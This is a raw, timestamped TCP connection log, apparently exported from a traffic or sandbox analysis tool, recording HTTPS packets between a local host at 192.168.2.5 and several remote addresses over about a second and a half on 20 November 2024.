                                                                                                                                                                                              Nov 20, 2024 21:28:18.095155954 CET44349729104.18.10.207192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:18.095376015 CET443497302.16.229.162192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:18.095443964 CET443497302.16.229.162192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:18.095489025 CET49730443192.168.2.52.16.229.162
                                                                                                                                                                                              Nov 20, 2024 21:28:18.108931065 CET44349729104.18.10.207192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:18.109118938 CET49729443192.168.2.5104.18.10.207
                                                                                                                                                                                              Nov 20, 2024 21:28:18.109181881 CET44349729104.18.10.207192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:18.109226942 CET44349729104.18.10.207192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:18.109291077 CET49729443192.168.2.5104.18.10.207
                                                                                                                                                                                              Nov 20, 2024 21:28:18.120559931 CET443497314.175.87.197192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:18.120809078 CET49731443192.168.2.54.175.87.197
                                                                                                                                                                                              Nov 20, 2024 21:28:18.232027054 CET49727443192.168.2.5141.193.213.10
                                                                                                                                                                                              Nov 20, 2024 21:28:18.232050896 CET44349727141.193.213.10192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:18.233408928 CET49729443192.168.2.5104.18.10.207
                                                                                                                                                                                              Nov 20, 2024 21:28:18.233431101 CET44349729104.18.10.207192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:18.264904022 CET49730443192.168.2.52.16.229.162
                                                                                                                                                                                              Nov 20, 2024 21:28:18.264940977 CET443497302.16.229.162192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:18.268665075 CET49731443192.168.2.54.175.87.197
                                                                                                                                                                                              Nov 20, 2024 21:28:18.268734932 CET443497314.175.87.197192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:18.269646883 CET443497314.175.87.197192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:18.317904949 CET49739443192.168.2.5141.193.213.10
                                                                                                                                                                                              Nov 20, 2024 21:28:18.317945957 CET44349739141.193.213.10192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:18.318011999 CET49739443192.168.2.5141.193.213.10
                                                                                                                                                                                              Nov 20, 2024 21:28:18.318233013 CET49739443192.168.2.5141.193.213.10
                                                                                                                                                                                              Nov 20, 2024 21:28:18.318244934 CET44349739141.193.213.10192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:18.318655014 CET49740443192.168.2.5141.193.213.10
                                                                                                                                                                                              Nov 20, 2024 21:28:18.318741083 CET44349740141.193.213.10192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:18.318809986 CET49740443192.168.2.5141.193.213.10
                                                                                                                                                                                              Nov 20, 2024 21:28:18.319191933 CET49741443192.168.2.5141.193.213.10
                                                                                                                                                                                              Nov 20, 2024 21:28:18.319233894 CET44349741141.193.213.10192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:18.319283009 CET49741443192.168.2.5141.193.213.10
                                                                                                                                                                                              Nov 20, 2024 21:28:18.319447041 CET49740443192.168.2.5141.193.213.10
                                                                                                                                                                                              Nov 20, 2024 21:28:18.319514990 CET44349740141.193.213.10192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:18.319663048 CET49741443192.168.2.5141.193.213.10
                                                                                                                                                                                              Nov 20, 2024 21:28:18.319680929 CET44349741141.193.213.10192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:18.321311951 CET49731443192.168.2.54.175.87.197
                                                                                                                                                                                              Nov 20, 2024 21:28:18.323398113 CET49742443192.168.2.5141.193.213.10
                                                                                                                                                                                              Nov 20, 2024 21:28:18.323425055 CET44349742141.193.213.10192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:18.323496103 CET49742443192.168.2.5141.193.213.10
                                                                                                                                                                                              Nov 20, 2024 21:28:18.326664925 CET49742443192.168.2.5141.193.213.10
                                                                                                                                                                                              Nov 20, 2024 21:28:18.326695919 CET44349742141.193.213.10192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:18.464812040 CET4434973613.107.246.63192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:18.481539011 CET49736443192.168.2.513.107.246.63
                                                                                                                                                                                              Nov 20, 2024 21:28:18.481563091 CET4434973613.107.246.63192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:18.482065916 CET49736443192.168.2.513.107.246.63
                                                                                                                                                                                              Nov 20, 2024 21:28:18.482070923 CET4434973613.107.246.63192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:18.503204107 CET49748443192.168.2.52.16.229.162
                                                                                                                                                                                              Nov 20, 2024 21:28:18.503246069 CET443497482.16.229.162192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:18.503339052 CET49748443192.168.2.52.16.229.162
                                                                                                                                                                                              Nov 20, 2024 21:28:18.503675938 CET49748443192.168.2.52.16.229.162
                                                                                                                                                                                              Nov 20, 2024 21:28:18.503694057 CET443497482.16.229.162192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:18.519726992 CET4434973413.107.246.63192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:18.527204037 CET4434973213.107.246.63192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:18.534522057 CET44349738141.193.213.10192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:18.537642002 CET4434973313.107.246.63192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:18.552247047 CET49738443192.168.2.5141.193.213.10
                                                                                                                                                                                              Nov 20, 2024 21:28:18.552273989 CET44349738141.193.213.10192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:18.552853107 CET44349738141.193.213.10192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:18.553447962 CET49738443192.168.2.5141.193.213.10
                                                                                                                                                                                              Nov 20, 2024 21:28:18.553567886 CET44349738141.193.213.10192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:18.553762913 CET49738443192.168.2.5141.193.213.10
                                                                                                                                                                                              Nov 20, 2024 21:28:18.561009884 CET49734443192.168.2.513.107.246.63
                                                                                                                                                                                              Nov 20, 2024 21:28:18.561042070 CET4434973413.107.246.63192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:18.561916113 CET49734443192.168.2.513.107.246.63
                                                                                                                                                                                              Nov 20, 2024 21:28:18.561923981 CET4434973413.107.246.63192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:18.562658072 CET49732443192.168.2.513.107.246.63
                                                                                                                                                                                              Nov 20, 2024 21:28:18.562674046 CET4434973213.107.246.63192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:18.563376904 CET49732443192.168.2.513.107.246.63
                                                                                                                                                                                              Nov 20, 2024 21:28:18.563381910 CET4434973213.107.246.63192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:18.563945055 CET49733443192.168.2.513.107.246.63
                                                                                                                                                                                              Nov 20, 2024 21:28:18.563973904 CET4434973313.107.246.63192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:18.564552069 CET49733443192.168.2.513.107.246.63
                                                                                                                                                                                              Nov 20, 2024 21:28:18.564562082 CET4434973313.107.246.63192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:18.595340014 CET44349738141.193.213.10192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:18.614377022 CET4434973513.107.246.63192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:18.615381956 CET49735443192.168.2.513.107.246.63
                                                                                                                                                                                              Nov 20, 2024 21:28:18.615411043 CET4434973513.107.246.63192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:18.619018078 CET49735443192.168.2.513.107.246.63
                                                                                                                                                                                              Nov 20, 2024 21:28:18.619033098 CET4434973513.107.246.63192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:18.624361038 CET44349737141.193.213.10192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:18.625107050 CET49737443192.168.2.5141.193.213.10
                                                                                                                                                                                              Nov 20, 2024 21:28:18.625121117 CET44349737141.193.213.10192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:18.625570059 CET44349737141.193.213.10192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:18.626071930 CET49737443192.168.2.5141.193.213.10
                                                                                                                                                                                              Nov 20, 2024 21:28:18.626152039 CET44349737141.193.213.10192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:18.626244068 CET49737443192.168.2.5141.193.213.10
                                                                                                                                                                                              Nov 20, 2024 21:28:18.667337894 CET44349737141.193.213.10192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:18.757787943 CET49753443192.168.2.545.61.136.196
                                                                                                                                                                                              Nov 20, 2024 21:28:18.757826090 CET4434975345.61.136.196192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:18.757927895 CET49753443192.168.2.545.61.136.196
                                                                                                                                                                                              Nov 20, 2024 21:28:18.758965969 CET49753443192.168.2.545.61.136.196
                                                                                                                                                                                              Nov 20, 2024 21:28:18.758977890 CET4434975345.61.136.196192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:18.799631119 CET49754443192.168.2.5141.193.213.11
                                                                                                                                                                                              Nov 20, 2024 21:28:18.799679041 CET44349754141.193.213.11192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:18.799751997 CET49754443192.168.2.5141.193.213.11
                                                                                                                                                                                              Nov 20, 2024 21:28:18.799864054 CET49755443192.168.2.5141.193.213.11
                                                                                                                                                                                              Nov 20, 2024 21:28:18.799911022 CET44349755141.193.213.11192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:18.799988031 CET49755443192.168.2.5141.193.213.11
                                                                                                                                                                                              Nov 20, 2024 21:28:18.800188065 CET49754443192.168.2.5141.193.213.11
                                                                                                                                                                                              Nov 20, 2024 21:28:18.800204039 CET44349754141.193.213.11192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:18.800367117 CET49755443192.168.2.5141.193.213.11
                                                                                                                                                                                              Nov 20, 2024 21:28:18.800396919 CET44349755141.193.213.11192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:18.869343042 CET49756443192.168.2.5136.143.182.97
                                                                                                                                                                                              Nov 20, 2024 21:28:18.869370937 CET44349756136.143.182.97192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:18.869626999 CET49756443192.168.2.5136.143.182.97
                                                                                                                                                                                              Nov 20, 2024 21:28:18.879390955 CET49756443192.168.2.5136.143.182.97
                                                                                                                                                                                              Nov 20, 2024 21:28:18.879417896 CET44349756136.143.182.97192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:18.902575016 CET4434973613.107.246.63192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:18.902647972 CET4434973613.107.246.63192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:18.902987957 CET49736443192.168.2.513.107.246.63
                                                                                                                                                                                              Nov 20, 2024 21:28:18.903048038 CET49736443192.168.2.513.107.246.63
                                                                                                                                                                                              Nov 20, 2024 21:28:18.903074980 CET4434973613.107.246.63192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:18.903091908 CET49736443192.168.2.513.107.246.63
                                                                                                                                                                                              Nov 20, 2024 21:28:18.903100967 CET4434973613.107.246.63192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:18.906311035 CET49757443192.168.2.513.107.246.63
                                                                                                                                                                                              Nov 20, 2024 21:28:18.906394958 CET4434975713.107.246.63192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:18.906512022 CET49757443192.168.2.513.107.246.63
                                                                                                                                                                                              Nov 20, 2024 21:28:18.906716108 CET49757443192.168.2.513.107.246.63
                                                                                                                                                                                              Nov 20, 2024 21:28:18.906748056 CET4434975713.107.246.63192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:18.969074965 CET4434973413.107.246.63192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:18.969105005 CET4434973413.107.246.63192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:18.969157934 CET49734443192.168.2.513.107.246.63
                                                                                                                                                                                              Nov 20, 2024 21:28:18.969172955 CET4434973413.107.246.63192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:18.969346046 CET49734443192.168.2.513.107.246.63
                                                                                                                                                                                              Nov 20, 2024 21:28:18.969362020 CET4434973413.107.246.63192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:18.969372034 CET49734443192.168.2.513.107.246.63
                                                                                                                                                                                              Nov 20, 2024 21:28:18.969533920 CET4434973413.107.246.63192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:18.969578028 CET4434973413.107.246.63192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:18.969677925 CET49734443192.168.2.513.107.246.63
                                                                                                                                                                                              Nov 20, 2024 21:28:18.973334074 CET49758443192.168.2.513.107.246.63
                                                                                                                                                                                              Nov 20, 2024 21:28:18.973366976 CET4434975813.107.246.63192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:18.973472118 CET49758443192.168.2.513.107.246.63
                                                                                                                                                                                              Nov 20, 2024 21:28:18.974147081 CET49758443192.168.2.513.107.246.63
                                                                                                                                                                                              Nov 20, 2024 21:28:18.974167109 CET4434975813.107.246.63192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:18.984644890 CET4434973213.107.246.63192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:18.984673977 CET4434973213.107.246.63192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:18.984756947 CET49732443192.168.2.513.107.246.63
                                                                                                                                                                                              Nov 20, 2024 21:28:18.984776974 CET4434973213.107.246.63192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:18.984841108 CET49732443192.168.2.513.107.246.63
                                                                                                                                                                                              Nov 20, 2024 21:28:18.987293959 CET49732443192.168.2.513.107.246.63
                                                                                                                                                                                              Nov 20, 2024 21:28:18.987306118 CET4434973213.107.246.63192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:18.987374067 CET49732443192.168.2.513.107.246.63
                                                                                                                                                                                              Nov 20, 2024 21:28:18.987515926 CET4434973213.107.246.63192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:18.987561941 CET4434973213.107.246.63192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:18.987751007 CET49732443192.168.2.513.107.246.63
                                                                                                                                                                                              Nov 20, 2024 21:28:18.995991945 CET49759443192.168.2.513.107.246.63
                                                                                                                                                                                              Nov 20, 2024 21:28:18.996026039 CET4434975913.107.246.63192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:18.996210098 CET49759443192.168.2.513.107.246.63
                                                                                                                                                                                              Nov 20, 2024 21:28:18.996555090 CET49759443192.168.2.513.107.246.63
                                                                                                                                                                                              Nov 20, 2024 21:28:18.996577978 CET4434975913.107.246.63192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:19.009702921 CET4434973313.107.246.63192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:19.009867907 CET4434973313.107.246.63192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:19.010031939 CET49733443192.168.2.513.107.246.63
                                                                                                                                                                                              Nov 20, 2024 21:28:19.010189056 CET49733443192.168.2.513.107.246.63
                                                                                                                                                                                              Nov 20, 2024 21:28:19.010205984 CET4434973313.107.246.63192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:19.010219097 CET49733443192.168.2.513.107.246.63
                                                                                                                                                                                              Nov 20, 2024 21:28:19.010226011 CET4434973313.107.246.63192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:19.012376070 CET49760443192.168.2.513.107.246.63
                                                                                                                                                                                              Nov 20, 2024 21:28:19.012459040 CET4434976013.107.246.63192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:19.012541056 CET49760443192.168.2.513.107.246.63
                                                                                                                                                                                              Nov 20, 2024 21:28:19.012727022 CET49760443192.168.2.513.107.246.63
                                                                                                                                                                                              Nov 20, 2024 21:28:19.012762070 CET4434976013.107.246.63192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:19.015003920 CET44349738141.193.213.10192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:19.015135050 CET44349738141.193.213.10192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:19.015228987 CET44349738141.193.213.10192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:19.015295982 CET49738443192.168.2.5141.193.213.10
                                                                                                                                                                                              Nov 20, 2024 21:28:19.015345097 CET44349738141.193.213.10192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:19.015377045 CET44349738141.193.213.10192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:19.015412092 CET49738443192.168.2.5141.193.213.10
                                                                                                                                                                                              Nov 20, 2024 21:28:19.015531063 CET44349738141.193.213.10192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:19.015584946 CET49738443192.168.2.5141.193.213.10
                                                                                                                                                                                              Nov 20, 2024 21:28:19.015615940 CET44349738141.193.213.10192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:19.031555891 CET44349738141.193.213.10192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:19.031636953 CET49738443192.168.2.5141.193.213.10
                                                                                                                                                                                              Nov 20, 2024 21:28:19.031646013 CET44349738141.193.213.10192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:19.031670094 CET44349738141.193.213.10192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:19.031785011 CET49738443192.168.2.5141.193.213.10
                                                                                                                                                                                              Nov 20, 2024 21:28:19.080791950 CET4434973513.107.246.63192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:19.080823898 CET4434973513.107.246.63192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:19.080895901 CET49735443192.168.2.513.107.246.63
                                                                                                                                                                                              Nov 20, 2024 21:28:19.080918074 CET4434973513.107.246.63192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:19.080986023 CET49735443192.168.2.513.107.246.63
                                                                                                                                                                                              Nov 20, 2024 21:28:19.081068993 CET49735443192.168.2.513.107.246.63
                                                                                                                                                                                              Nov 20, 2024 21:28:19.081075907 CET4434973513.107.246.63192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:19.081160069 CET49735443192.168.2.513.107.246.63
                                                                                                                                                                                              Nov 20, 2024 21:28:19.081273079 CET4434973513.107.246.63192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:19.081312895 CET4434973513.107.246.63192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:19.081362009 CET49735443192.168.2.513.107.246.63
                                                                                                                                                                                              Nov 20, 2024 21:28:19.083695889 CET49761443192.168.2.513.107.246.63
                                                                                                                                                                                              Nov 20, 2024 21:28:19.083731890 CET4434976113.107.246.63192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:19.083798885 CET49761443192.168.2.513.107.246.63
                                                                                                                                                                                              Nov 20, 2024 21:28:19.083966970 CET49761443192.168.2.513.107.246.63
                                                                                                                                                                                              Nov 20, 2024 21:28:19.083981037 CET4434976113.107.246.63192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:19.096507072 CET44349737141.193.213.10192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:19.096570015 CET44349737141.193.213.10192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:19.097029924 CET49737443192.168.2.5141.193.213.10
                                                                                                                                                                                              Nov 20, 2024 21:28:19.097657919 CET49737443192.168.2.5141.193.213.10
                                                                                                                                                                                              Nov 20, 2024 21:28:19.097677946 CET44349737141.193.213.10192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:19.098165989 CET49762443192.168.2.5141.193.213.10
                                                                                                                                                                                              Nov 20, 2024 21:28:19.098186970 CET44349762141.193.213.10192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:19.098572969 CET49762443192.168.2.5141.193.213.10
                                                                                                                                                                                              Nov 20, 2024 21:28:19.100266933 CET49762443192.168.2.5141.193.213.10
                                                                                                                                                                                              Nov 20, 2024 21:28:19.100282907 CET44349762141.193.213.10192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:19.107283115 CET49763443192.168.2.5141.193.213.11
                                                                                                                                                                                              Nov 20, 2024 21:28:19.107311010 CET44349763141.193.213.11192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:19.107405901 CET49763443192.168.2.5141.193.213.11
                                                                                                                                                                                              Nov 20, 2024 21:28:19.107815981 CET49763443192.168.2.5141.193.213.11
                                                                                                                                                                                              Nov 20, 2024 21:28:19.107832909 CET44349763141.193.213.11192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:19.134423018 CET44349738141.193.213.10192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:19.179554939 CET49738443192.168.2.5141.193.213.10
                                                                                                                                                                                              Nov 20, 2024 21:28:19.207482100 CET44349738141.193.213.10192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:19.211345911 CET44349738141.193.213.10192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:19.213082075 CET44349738141.193.213.10192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:19.213166952 CET49738443192.168.2.5141.193.213.10
                                                                                                                                                                                              Nov 20, 2024 21:28:19.213210106 CET44349738141.193.213.10192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:19.213774920 CET49738443192.168.2.5141.193.213.10
                                                                                                                                                                                              Nov 20, 2024 21:28:19.221286058 CET44349738141.193.213.10192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:19.229214907 CET44349738141.193.213.10192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:19.229276896 CET49738443192.168.2.5141.193.213.10
                                                                                                                                                                                              Nov 20, 2024 21:28:19.229304075 CET44349738141.193.213.10192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:19.237319946 CET44349738141.193.213.10192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:19.237391949 CET49738443192.168.2.5141.193.213.10
                                                                                                                                                                                              Nov 20, 2024 21:28:19.237409115 CET44349738141.193.213.10192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:19.237433910 CET44349738141.193.213.10192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:19.237492085 CET49738443192.168.2.5141.193.213.10
                                                                                                                                                                                              Nov 20, 2024 21:28:19.245208979 CET44349738141.193.213.10192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:19.253546000 CET44349738141.193.213.10192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:19.253633022 CET49738443192.168.2.5141.193.213.10
                                                                                                                                                                                              Nov 20, 2024 21:28:19.253655910 CET44349738141.193.213.10192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:19.261499882 CET44349738141.193.213.10192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:19.261574030 CET49738443192.168.2.5141.193.213.10
                                                                                                                                                                                              Nov 20, 2024 21:28:19.261656046 CET44349738141.193.213.10192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:19.269583941 CET44349738141.193.213.10192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:19.269696951 CET49738443192.168.2.5141.193.213.10
                                                                                                                                                                                              Nov 20, 2024 21:28:19.269726992 CET44349738141.193.213.10192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:19.284262896 CET44349738141.193.213.10192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:19.284356117 CET49738443192.168.2.5141.193.213.10
                                                                                                                                                                                              Nov 20, 2024 21:28:19.284359932 CET44349738141.193.213.10192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:19.284385920 CET44349738141.193.213.10192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:19.284446001 CET49738443192.168.2.5141.193.213.10
                                                                                                                                                                                              Nov 20, 2024 21:28:19.411336899 CET44349738141.193.213.10192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:19.413717031 CET44349738141.193.213.10192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:19.413791895 CET49738443192.168.2.5141.193.213.10
                                                                                                                                                                                              Nov 20, 2024 21:28:19.413805962 CET44349738141.193.213.10192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:19.413829088 CET44349738141.193.213.10192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:19.413882971 CET49738443192.168.2.5141.193.213.10
                                                                                                                                                                                              Nov 20, 2024 21:28:19.418154955 CET44349738141.193.213.10192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:19.422647953 CET44349738141.193.213.10192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:19.422732115 CET49738443192.168.2.5141.193.213.10
                                                                                                                                                                                              Nov 20, 2024 21:28:19.422749996 CET44349738141.193.213.10192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:19.427426100 CET44349738141.193.213.10192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:19.427485943 CET49738443192.168.2.5141.193.213.10
                                                                                                                                                                                              Nov 20, 2024 21:28:19.427501917 CET44349738141.193.213.10192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:19.431987047 CET44349738141.193.213.10192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:19.432097912 CET49738443192.168.2.5141.193.213.10
                                                                                                                                                                                              Nov 20, 2024 21:28:19.432117939 CET44349738141.193.213.10192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:19.441317081 CET44349738141.193.213.10192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:19.441389084 CET49738443192.168.2.5141.193.213.10
                                                                                                                                                                                              Nov 20, 2024 21:28:19.441404104 CET44349738141.193.213.10192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:19.441478968 CET49738443192.168.2.5141.193.213.10
                                                                                                                                                                                              Nov 20, 2024 21:28:19.450190067 CET44349738141.193.213.10192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:19.450263023 CET49738443192.168.2.5141.193.213.10
                                                                                                                                                                                              Nov 20, 2024 21:28:19.450320005 CET44349738141.193.213.10192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:19.450511932 CET49738443192.168.2.5141.193.213.10
                                                                                                                                                                                              Nov 20, 2024 21:28:19.459355116 CET44349738141.193.213.10192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:19.459580898 CET49738443192.168.2.5141.193.213.10
                                                                                                                                                                                              Nov 20, 2024 21:28:19.468619108 CET44349738141.193.213.10192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:19.468735933 CET49738443192.168.2.5141.193.213.10
                                                                                                                                                                                              Nov 20, 2024 21:28:19.473267078 CET44349738141.193.213.10192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:19.473346949 CET49738443192.168.2.5141.193.213.10
                                                                                                                                                                                              Nov 20, 2024 21:28:19.477618933 CET44349738141.193.213.10192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:19.477700949 CET49738443192.168.2.5141.193.213.10
                                                                                                                                                                                              Nov 20, 2024 21:28:19.477731943 CET44349738141.193.213.10192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:19.477787971 CET44349738141.193.213.10192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:19.477849007 CET49738443192.168.2.5141.193.213.10
                                                                                                                                                                                              Nov 20, 2024 21:28:19.478030920 CET49738443192.168.2.5141.193.213.10
                                                                                                                                                                                              Nov 20, 2024 21:28:19.478061914 CET44349738141.193.213.10192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:19.478085995 CET49738443192.168.2.5141.193.213.10
                                                                                                                                                                                              Nov 20, 2024 21:28:19.478117943 CET49738443192.168.2.5141.193.213.10
                                                                                                                                                                                              Nov 20, 2024 21:28:19.544032097 CET44349740141.193.213.10192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:19.546072960 CET44349742141.193.213.10192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:19.546114922 CET49740443192.168.2.5141.193.213.10
                                                                                                                                                                                              Nov 20, 2024 21:28:19.546160936 CET44349740141.193.213.10192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:19.546611071 CET49742443192.168.2.5141.193.213.10
                                                                                                                                                                                              Nov 20, 2024 21:28:19.546654940 CET44349742141.193.213.10192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:19.547645092 CET44349740141.193.213.10192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:19.547729969 CET49740443192.168.2.5141.193.213.10
                                                                                                                                                                                              Nov 20, 2024 21:28:19.548111916 CET44349742141.193.213.10192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:19.548188925 CET49742443192.168.2.5141.193.213.10
